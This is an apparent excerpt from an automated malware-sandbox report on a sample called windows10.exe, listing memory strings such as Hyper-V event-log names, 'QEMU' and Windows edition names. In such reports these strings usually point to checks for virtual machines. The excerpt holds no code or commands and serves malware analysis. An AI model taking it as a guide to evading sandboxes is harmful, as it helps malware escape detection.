            Source: windows10.exe, 0000001E.00000003.2894301189.00000000006E9000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2677112034.00000000006E3000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2784380018.00000000006E7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Microsoft-Windows-Hyper-V-VID-AnalyticLMEMP@
            Source: windows10.exe, 0000001D.00000003.2367709156.000000000086A000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2360685107.000000000083D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/Admin$
            Source: windows10.exe, 0000001E.00000003.2894301189.00000000006E9000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2677112034.00000000006E3000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2784380018.00000000006E7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/AdminLMEM`h
            Source: windows10.exe, 0000001D.00000003.2366816542.000000000084D000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2368207015.000000000085A000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2360685107.000000000083D000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2416185354.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2897811597.000000000A04A000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3631220152.000000000A06A000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2899145476.000000000A056000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3515474400.000000000A067000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3215839238.000000000A04B000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3514693196.000000000A065000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Microsoft-Windows-Hyper-V-Hypervisor-Operational
            Source: windows10.exe, 0000001D.00000003.2368345020.0000000000843000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2366816542.0000000000843000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2360685107.000000000083D000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2364272105.0000000000840000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3628086106.000000000A04F000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3406241581.00000000006F4000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2306441919.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3318845003.00000000006F1000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3213586625.00000000006F2000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2587239375.00000000006DF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Microsoft-Windows-Hyper-V-VID-AnalyticLMEMP
            Source: windows10.exe, 0000001E.00000003.2894301189.00000000006E9000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2677112034.00000000006E3000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2784380018.00000000006E7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/OperationalLMEMhX
            Source: windows10.exe, 0000001E.00000003.3414132926.000000000A06E000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3410591707.000000000A04B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Microsoft-Windows-Hyper-V-Hypervisor-Admin*
            Source: windows10.exe, 0000001D.00000003.2365111459.0000000000835000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2363728442.000000000082D000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2262021134.00000000006A9000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3406241581.00000000006F4000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2306441919.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3213586625.00000000006F2000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2587239375.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2354495829.000000000070F000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3628455964.00000000006FA000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3506506350.00000000006F0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Microsoft-Windows-Hyper-V-Hypervisor-OperationalLMEMh
            Source: windows10.exe, 0000001D.00000002.4303445790.0000000002A50000.00000040.00001000.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2145511697.000000007FDC0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SecureVirtualMachine
            Source: windows10.exe, 0000001E.00000003.3215839238.000000000A04B000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3218987599.000000000A060000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Microsoft-Windows-Hyper-V-Hypervisor-Admin.
            Source: windows10.exe, 0000001E.00000003.2787786782.000000000A047000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2788629131.000000000A053000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/Admin2
            Source: windows10.exe, 0000001E.00000003.3414132926.000000000A06E000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3410591707.000000000A04B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/Admin'
            Source: windows10.exe, 0000001D.00000003.2365111459.0000000000835000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2363728442.000000000082D000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2262021134.00000000006A9000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3406241581.00000000006F4000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2306441919.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3213586625.00000000006F2000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2587239375.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2354495829.000000000070F000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3628455964.00000000006FA000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3117755720.00000000006E7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/DiagnoseLMEMh
            Source: windows10.exe, 0000001E.00000003.2679931213.000000000A047000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2680934915.000000000A053000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Microsoft-Windows-Hyper-V-Hypervisor-Operational\
            Source: windows10.exe, 0000001E.00000003.3120356246.000000000A04E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Microsoft-Windows-Hyper-V-Hypervisor-Admin6
            Source: windows10.exe, 0000001E.00000003.3321671075.000000000A053000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3316480949.000000000A04D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/DebugatLMEM`
            Source: windows10.exe, 0000001E.00000003.3215839238.000000000A04B000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3218987599.000000000A060000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Microsoft-Windows-Hyper-V-VID-Admin{
            Source: windows10.exe, 0000001E.00000003.2503011294.00000000006E6000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2502558872.00000000006DF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Microsoft-Windows-Hyper-V-Hypervisor-Admin<
            Source: windows10.exe, 0000001E.00000003.3414132926.000000000A06E000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3410591707.000000000A04B000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3415956998.000000000A072000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/OperationalpXDe
            Source: windows10.exe, 0000001E.00000003.2590530414.000000000A041000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2591548285.000000000A044000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Microsoft-Windows-Hyper-V-VID-Analytic
            Source: windows10.exe, 0000001E.00000003.2787786782.000000000A047000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2788629131.000000000A053000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Microsoft-Windows-Hyper-V-Hypervisor-Operationalb
            Source: windows10.exe, 0000001E.00000003.3509025633.000000000A053000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3513785119.000000000A06A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Microsoft-Windows-Hyper-V-Hypervisor-AdminD
            Source: windows10.exe, 0000001E.00000003.2590530414.000000000A041000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2591045873.000000000A048000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Microsoft-Windows-Hyper-V-Hypervisor-AdminM
            Source: windows10.exe, 0000001D.00000003.2365111459.0000000000835000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2363728442.000000000082D000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2262021134.00000000006A9000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3406241581.00000000006F4000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2306441919.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3213586625.00000000006F2000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2587239375.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2354495829.000000000070F000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3628455964.00000000006FA000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3117755720.00000000006E7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/AnalyticLMEMh
            Source: windows10.exe, 0000001D.00000003.2360129481.000000000086D000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2367709156.0000000000872000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3124024616.000000000A05C000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2416185354.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2679931213.000000000A047000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2897811597.000000000A04A000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2899145476.000000000A056000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3014016569.000000000A05B000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2308870441.0000000000716000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2306441919.00000000006E0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Microsoft-Windows-Hyper-V-VID-Admin
            Source: windows10.exe, 0000001D.00000003.2360129481.000000000086D000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2367709156.0000000000872000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3124024616.000000000A05C000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2679931213.000000000A047000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2502753532.000000000A05C000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3509025633.000000000A053000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3014016569.000000000A05B000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3120356246.000000000A04E000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3513785119.000000000A06A000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3323654097.000000000A054000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Microsoft-Windows-Hyper-V-VID-Analytic
            Source: windows10.exe, 0000001E.00000003.2306441919.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2308870441.0000000000710000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2307427865.0000000000714000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2308352872.0000000000703000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/Adminv@_
            Source: windows10.exe, 0000001E.00000003.3014016569.000000000A05B000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3011554215.000000000A04F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Hypervisor-AdminT
            Source: windows10.exe, 0000001D.00000002.4303445790.0000000002A50000.00000040.00001000.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2144509027.000000007FCF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Enterprise without Hyper-V Full
            Source: windows10.exe, 0000001D.00000003.2367709156.000000000086A000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2360685107.000000000083D000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2416185354.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2897811597.000000000A04A000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3414132926.000000000A06E000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2899145476.000000000A056000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3215839238.000000000A04B000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2306441919.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2590530414.000000000A041000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2415544285.00000000006E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-NETVSC/Diagnostic
            Source: windows10.exe, 0000001E.00000003.3014016569.000000000A05B000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3120356246.000000000A04E000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3011554215.000000000A04F000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3124024616.000000000A066000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Hypervisor-Operationaly
            Source: windows10.exe, 0000001E.00000003.2416185354.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2415544285.00000000006E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/Operationaly
            Source: windows10.exe, 0000001E.00000003.2260356698.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2263029357.00000000006D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-NETVSC/Diagnostic'
            Source: windows10.exe, 0000001E.00000003.2413534085.0000000000709000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/OperationalLMEMh0fm@
            Source: windows10.exe, 0000001E.00000003.2679931213.000000000A047000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2897811597.000000000A04A000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3414132926.000000000A06E000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3631220152.000000000A06A000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2899145476.000000000A056000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3014016569.000000000A05B000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2306441919.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2356244803.00000000006E6000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3120356246.000000000A04E000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3410591707.000000000A04B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/Debug
            Source: windows10.exe, 0000001E.00000003.3510497039.00000000006EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/OperationalLMEMh
            Source: windows10.exe, 0000001D.00000002.4303445790.0000000002A50000.00000040.00001000.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2144509027.000000007FCF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Standard without Hyper-V Full
            Source: windows10.exe, 0000001E.00000003.3120356246.000000000A04E000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3124024616.000000000A066000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/Diagnose{
            Source: windows10.exe, 0000001D.00000003.2360685107.000000000083D000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3406241581.00000000006F4000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2306441919.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3318845003.00000000006F1000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3213586625.00000000006F2000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2587239375.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2353191902.0000000000712000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3506506350.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2261162509.00000000006B2000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3117755720.00000000006E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-NETVSC/DiagnosticLMEMX
            Source: windows10.exe, 0000001E.00000003.2894301189.00000000006E9000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2677112034.00000000006E3000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2784380018.00000000006E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/AnalyticLMEMhd
            Source: windows10.exe, 0000001E.00000003.3506506350.00000000006F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/AdminLMEM`0
            Source: windows10.exe, 0000001D.00000003.2367709156.000000000086A000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2360685107.000000000083D000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2416185354.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2679931213.000000000A047000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2897811597.000000000A04A000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2899145476.000000000A056000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2306441919.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2415544285.00000000006E1000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2787786782.000000000A047000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3323654097.000000000A054000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Hypervisor-Admin
            Source: windows10.exe, 0000001E.00000003.3215839238.000000000A04B000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3218987599.000000000A060000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-VID-Analytic!
            Source: windows10.exe, 0000001E.00000003.3509025633.000000000A053000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3513785119.000000000A06A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-VID-AdminK
            Source: windows10.exe, 0000001E.00000003.2415217489.000000000071E000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2416072475.000000000071E000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2413534085.0000000000709000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/AdminPaLMEM`@fm
            Source: windows10.exe, 0000001E.00000003.2263569596.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2264564819.00000000006D8000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2260356698.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2263029357.00000000006D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/Operationalltu
            Source: windows10.exe, 0000001E.00000003.2894301189.00000000006E9000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2677112034.00000000006E3000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2784380018.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2896982508.00000000006F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Hypervisor-AdminLMEMXT
            Source: windows10.exe, 0000001E.00000003.3510497039.00000000006EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/DiagnoseLMEMh$
            Source: windows10.exe, 0000001D.00000002.4303445790.0000000002A50000.00000040.00001000.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2144509027.000000007FCF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: stQEMU
            Source: windows10.exe, 0000001D.00000003.2367709156.000000000086A000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2360685107.000000000083D000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2416185354.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2679931213.000000000A047000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2897811597.000000000A04A000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3414132926.000000000A06E000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2899145476.000000000A056000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3215839238.000000000A04B000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3509025633.000000000A053000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2415544285.00000000006E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Hypervisor-Analytic
            Source: windows10.exe, 0000001D.00000003.2367709156.000000000086A000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2360685107.000000000083D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/Debug)
            Source: windows10.exe, 0000001D.00000002.4303445790.0000000002A50000.00000040.00001000.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2144509027.000000007FCF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 6without Hyper-V for Windows Essential Server Solutions
            Source: windows10.exe, 0000001E.00000003.2894301189.00000000006E9000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2677112034.00000000006E3000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2784380018.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2896982508.00000000006F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-NETVSC/DiagnosticLMEMXH
            Source: windows10.exe, 0000001D.00000003.2365111459.0000000000835000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2363728442.000000000082D000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2262021134.00000000006A9000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3406241581.00000000006F4000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2306441919.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2587239375.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2354495829.000000000070F000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3117755720.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3009374102.00000000006E9000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3320507831.00000000006ED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/OperationalLMEMh
            Source: windows10.exe, 0000001E.00000003.2308870441.0000000000716000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2306441919.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2308352872.0000000000703000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Hypervisor-Operational|FR
            Source: windows10.exe, 0000001E.00000003.2502753532.000000000A05C000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2590530414.000000000A041000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2355303518.000000000A04A000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2591548285.000000000A044000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2502347484.000000000A058000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2354825006.000000000A045000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2500722600.000000000A049000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-VID-Adminp
            Source: windows10.exe, 0000001E.00000003.3321671075.000000000A053000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3316480949.000000000A04D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Hypervisor-AnalyticosLMEM`
            Source: windows10.exe, 0000001E.00000003.3631220152.000000000A06A000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3629915822.000000000A06F000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3626790511.000000000A054000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-VID-AnalyticA
            Source: windows10.exe, 0000001E.00000003.2787786782.000000000A047000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2788629131.000000000A053000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-VID-Analytic2
            Source: windows10.exe, 0000001D.00000002.4303445790.0000000002A50000.00000040.00001000.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2144509027.000000007FCF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Standard without Hyper-V Core
